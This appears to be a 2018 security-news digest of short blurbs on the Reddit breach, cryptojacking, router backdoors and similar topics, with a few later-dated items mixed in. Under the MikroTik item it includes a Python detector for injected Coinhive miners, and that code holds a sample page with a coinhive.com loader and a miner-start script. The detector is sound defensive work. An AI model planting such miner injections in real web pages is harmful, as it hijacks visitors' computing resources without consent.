Sat.Jul 28, 2018 - Fri.Aug 03, 2018

Identifying People by Metadata

Schneier on Security

Interesting research: "You are your Metadata: Identification and Obfuscation of Social Media Users using Metadata Information," by Beatrice Perez, Mirco Musolesi, and Gianluca Stringhini. Abstract: Metadata are associated with most of the information we produce in our daily interactions and communication in the digital world. Yet, surprisingly, metadata are often still categorized as non-sensitive.

NEW TECH: DataLocker introduces encrypted flash drive — with key pad

The Last Watchdog

One sliver of the $90 billion, or so, companies are expected to spend this year on cybersecurity products and services is an estimated $85 million they will shell out for encrypted flash drives. One of the more fascinating innovators in this space is 11-year-old DataLocker, based in Overland Park, Kansas. Related: How DataLocker got its start h. Co-founder Jay took a business trip to South Korea in the fall of 2007.

Reddit Breach Highlights Limits of SMS-Based Authentication

Krebs on Security

Reddit.com today disclosed that a data breach exposed some internal data, as well as email addresses and passwords for some Reddit users. As Web site breaches go, this one doesn’t seem too severe. What’s interesting about the incident is that it showcases once again why relying on mobile text messages (SMS) for two-factor authentication (2FA) can lull companies and end users into a false sense of security.

Why No HTTPS? Questions Answered, New Data, Path Forward

Troy Hunt

So that little project Scott Helme and I took on - WhyNoHTTPS.com - seems to have garnered quite a bit of attention. We had about 81k visitors drop by on the first day and for the most part, the feedback has been overwhelmingly positive. Most people have said it's great to have the data surfaced publicly and they've used that list to put some pressure on sites to up their game.

The Importance of User Roles and Permissions in Cybersecurity Software

How many people would you trust with your house keys? Chances are, you have a handful of trusted friends and family members who have an emergency copy, but you definitely wouldn’t hand those out too freely. You have stuff that’s worth protecting—and the more people that have access to your belongings, the higher the odds that something will go missing.

Three of My Books Are Available in DRM-Free E-Book Format

Schneier on Security

Humble Bundle sells groups of e-books at ridiculously low prices, DRM free. This month , the bundles are all Wiley titles, including three of my books: Applied Cryptography , Secrets and Lies , and Cryptography Engineering. $15 gets you everything, and they're all DRM-free. Even better, a portion of the proceeds goes to the EFF. As a board member, I've seen the other side of this.

Q&A: Crypto jackers redirect illicit mining ops to bigger targets — company servers

The Last Watchdog

Illicit crypto mining is advancing apace. It was easy to see this coming. It began when threat actors began stealthily embedding crypto mining functionality into the web browsers of unwitting individuals. Cryptojacking was born. And now, the next-level shift is underway. Related article: Illicit crypto mining hits cloud services. Cybercriminals have shifted their focus to burrowing onto company servers and then redirecting those corporate computing resources to crypto mining chores.

Weekly Update 98

Troy Hunt

It's the coffee-machine weekly update! A slight change of scenery but other than that, it's business as usual. I'm going to keep this intro super-brief because it's very near beer o'clock and I have a very important task to go and take care of: BBQ time pic.twitter.com/yq5hXOGABt — Troy Hunt (@troyhunt) August 3, 2018. References. Fashion Nexus suffered a data breach ("Is there an official statement?

GCHQ on Quantum Key Distribution

Schneier on Security

The UK's GCHQ delivers a brutally blunt assessment of quantum key distribution: QKD protocols address only the problem of agreeing keys for encrypting data. Ubiquitous on-demand modern services (such as verifying identities and data integrity, establishing network sessions, providing access control, and automatic software updates) rely more on authentication and integrity mechanisms -- such as digital signatures -- than on encryption.

National Cybersecurity Alliance advocates ‘shared responsibility’ for securing the Internet

The Last Watchdog

The targeting of Sen. Claire McCaskill by Russian intelligence agency hackers, as she runs for re-election, underscores the need for each individual and organization to take online privacy and security as a core part of our everyday lives. Related: Using ‘gamification’ for security training. The National Cyber Security Alliance is a non-profit group, underwritten by the top tech companies and biggest banks, that has been out there since 2001 promoting best practices and supplying pr

Reddit Hack: Attack Bypasses 2-Factor Authentication

Adam Levin

One of the world’s largest websites has announced a security compromise. Reddit, the self-proclaimed “front page of the Internet,” announced a security breach that occurred over a three-day period in June. What Happened. The hacker or hackers bypassed the site’s 2-Factor Authentication associated with several employees credentialed to access sensitive data and used that access to take email addresses, server logs, and a decade-old database containing logins and passwords.

IDC Analyst Report: The Open Source Blind Spot Putting Businesses at Risk

In a recent study, IDC found that 64% of organizations said they were already using open source in software development with a further 25% planning to in the next year. Most organizations are unaware of just how much open-source code is used and underestimate their dependency on it. As enterprises grow the use of open-source software, they face a new challenge: understanding the scope of open-source software that's being used throughout the organization and the corresponding exposure.

Summer Reading List

Adam Shostack

I’m honored to have my threat modeling book on this short list with Daniel Kahneman, Tony Hsieh, Nicole Forsgren, and Tom DeMarco: “ Summer Reading List: Top Recommendations from our Engineers.

Backdoors in Cisco Routers

Schneier on Security

We don't know if this is error or deliberate action, but five backdoors have been discovered already this year.

GUEST ESSAY: How SIEMS, UEBAs fall short in today’s turbulent threat landscape

The Last Watchdog

Understanding today’s cybersecurity landscape is complex. The amount of threats aimed at enterprises is staggering. More than 230,000 new malware samples are launched every day. The average small and medium-size business experiences a cyber attack 44 times every day. And the cost of damage directly related to cybercrime is adding up, expected to reach $6 trillion by 2021.

10 More Women in Security You May Not Know But Should

Dark Reading

The second installment in a series highlighting women who are driving change in cybersecurity but may not be on your radar - yet.

Beware of Pixels & Trackers on U.S. Healthcare Websites

The healthcare industry has massively adopted web tracking tools, including pixels and trackers. Tracking tools on user-authenticated and unauthenticated web pages can access personal health information (PHI) such as IP addresses, medical record numbers, home and email addresses, appointment dates, or other info provided by users on pages and thus can violate HIPAA Rules that govern the Use of Online Tracking Technologies by HIPAA Covered Entities and Business Associates.

CyberSecurity 2.0 Humble Bundle

Adam Shostack

Cybersecurity 2.0 is a new promo from Humble Bundle. Nearly $800 worth of books, including my Threat Modeling, Schneier’s Secrets and Lies, and a whole lot more!

The Poor Cybersecurity of US Space Assets

Schneier on Security

Good policy paper (summary here ) on the threats, current state, and potential policy solutions for the poor security of US space systems.

How Cloudflare Uses Lava Lamps to Guard Against Hackers

WIRED Threat Level

Inside Cloudflare's San Francisco office, 100 units of Edward Craven Walker’s groovy hardware help guard the internet.

Three Reasons You Should Treat Applications as Machine Identities in Your Security Strategy

Thales Cloud Protection & Licensing

This article was originally featured as a guest post on Venafi’s blog. Thales eSecurity and Venafi are technology partners. One of the biggest threats to machine identities today is the integrity of the software that runs within them and that dictates their programmed function. Whereas many machines worked independently in the past, the availability of ubiquitous communications is making it possible for networks of machines – including sensors, cloud applications, and distributed controls &

Hundreds of thousands MikroTik Routers involved in massive Coinhive cryptomining campaign

Security Affairs

Security experts have uncovered a massive cryptojacking campaign targeting MikroTik routers: the attackers change the devices’ configuration so that a Coinhive cryptocurrency mining script is injected into users’ web traffic.
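Because the miner is injected by the router into pages that the origin server never served, the defender’s vantage point is the HTML as it arrives at the client, not the server logs. The following is an added example, not code from Security Affairs or from the researchers who reported the campaign: a small detector that parses a page, pulls every external and inline script, and flags the ones that load the Coinhive library or instantiate its miner. The host name and the `CoinHive.Anonymous` / `coinhive.min.js` markers are assumptions about what an injected loader looks like, and both sample pages are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumptions for this example: the host the injected loader pulls from and
# the strings a Coinhive miner stub contains. Extend these for other miners.
MINER_HOSTS = {"coinhive.com"}
MINER_MARKERS = ("CoinHive.Anonymous", "coinhive.min.js")


class ScriptCollector(HTMLParser):
    """Collects the src of every external <script> and the body of every inline one."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def _is_miner_host(src: str) -> bool:
    # urlsplit handles absolute and protocol-relative (//host/...) URLs alike
    host = (urlsplit(src).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in MINER_HOSTS)


def find_miner_scripts(html: str):
    """Return (kind, evidence) tuples for every script that looks like an injected miner."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for src in parser.external:
        if _is_miner_host(src):
            hits.append(("external", src))
    for body in parser.inline:
        if any(marker in body for marker in MINER_MARKERS):
            hits.append(("inline", body.strip()[:60]))
    return hits


# Constructed sample pages: what the origin serves, and what a compromised
# router hands the client after injecting the loader and a miner stub.
CLEAN_PAGE = """<html><head><title>shop</title>
<script src="/static/app.js"></script></head>
<body><script>window.cart = [];</script></body></html>"""

INJECTED_PAGE = """<html><head><title>shop</title>
<script src="/static/app.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script></head>
<body><script>window.cart = [];</script>
<script>var miner = new CoinHive.Anonymous('sitekey'); miner.start();</script>
</body></html>"""


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, find_miner_scripts(page))
```

Run the detector against the same URL fetched through the suspect router and through a known-good path; a script that appears only on the router-side copy is the injection, which is also why sites served over HTTPS were not affected by this campaign: the router cannot modify what it cannot read.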

Hacking a Robot Vacuum

Schneier on Security

The Diqee 360 robotic vacuum cleaner can be turned into a surveillance device. The attack requires physical access to the device, so in the scheme of things it's not a big deal. But why in the world is the vacuum equipped with a microphone?

Fin7: The Inner Workings of a Billion-Dollar Hacking Group

WIRED Threat Level

The Justice Department announced the arrest of three members of notorious cybercrime group Fin7—and detailed some of their methods in the process.

ICO Release Annual Report

Privacy and Cybersecurity Law

The Information Commissioner’s Office have released their Annual Report for 2018. This blog summarises the key messages. Information Commissioner’s Thoughts […].

Cybersecurity Predictions for 2024

Within the past few years, ransomware attacks have turned to critical infrastructure, healthcare, and government entities. Attackers have taken advantage of the rapid shift to remote work and new technologies. Add to that hacktivism due to global conflicts and U.S. elections, and an increased focus on AI, and you have the perfect recipe for a knotty and turbulent 2024.

Hundreds of apps removed from Google Play store because were carrying Windows malware

Security Affairs

Google recently removed 145 applications from the official Google Play store because they were found to carry malicious Windows executables inside. Researchers from Palo Alto Networks reported the removals; the apps had been uploaded to Google Play between October and November 2017, which means Android users were exposed to them for months.

Using In-Game Purchases to Launder Money

Schneier on Security

Evidence that stolen credit cards are being used to purchase items in games like Clash of Clans, which are then resold for cash.

Understanding keys is key to understanding

Thales Cloud Protection & Licensing

The newest CipherTrust Cloud Key Manager capability. CipherTrust Cloud Key Manager is a multi-cloud encryption key management solution ideal for customers using Microsoft Azure Key Vault, Amazon Web Services Key Management Service, Microsoft Office 365 or Salesforce Shield Platform Encryption. Before I talk about the importance of the newest feature of CipherTrust Cloud Key Manager, let’s define some terms to get everyone thinking similarly about keys and key management.

The Last-Ditch Legal Fight to Stop 3-D Printed Guns

WIRED Threat Level

After five years, US lawmakers and law enforcement are starting to fight back against 3-D printed firearms and "ghost guns."

Reddit Warns Users of Data Breach

Dark Reading

An attacker broke into Reddit systems and accessed user data, email addresses, and a database of hashed passwords from 2007.

How the US Military Can Better Keep Hackers

Schneier on Security

Interesting commentary : The military is an impossible place for hackers thanks to antiquated career management, forced time away from technical positions, lack of mission, non-technical mid- and senior-level leadership, and staggering pay gaps, among other issues. It is possible the military needs a cyber corps in the future, but by accelerating promotions, offering graduate school to newly commissioned officers, easing limited lateral entry for exceptional private-sector talent, and shortening

Reddit discloses a data breach, a hacker accessed user data

Security Affairs

Reddit is warning its users of a security breach: an attacker broke into the platform’s systems and accessed user data, email addresses, and a 2007 backup database containing hashed passwords managed by the platform.

Facebook Uncovers New Fake Accounts Ahead of Midterm Elections

WIRED Threat Level

The company removed 32 pages and accounts from Facebook and Instagram for “coordinated inauthentic behavior.”.
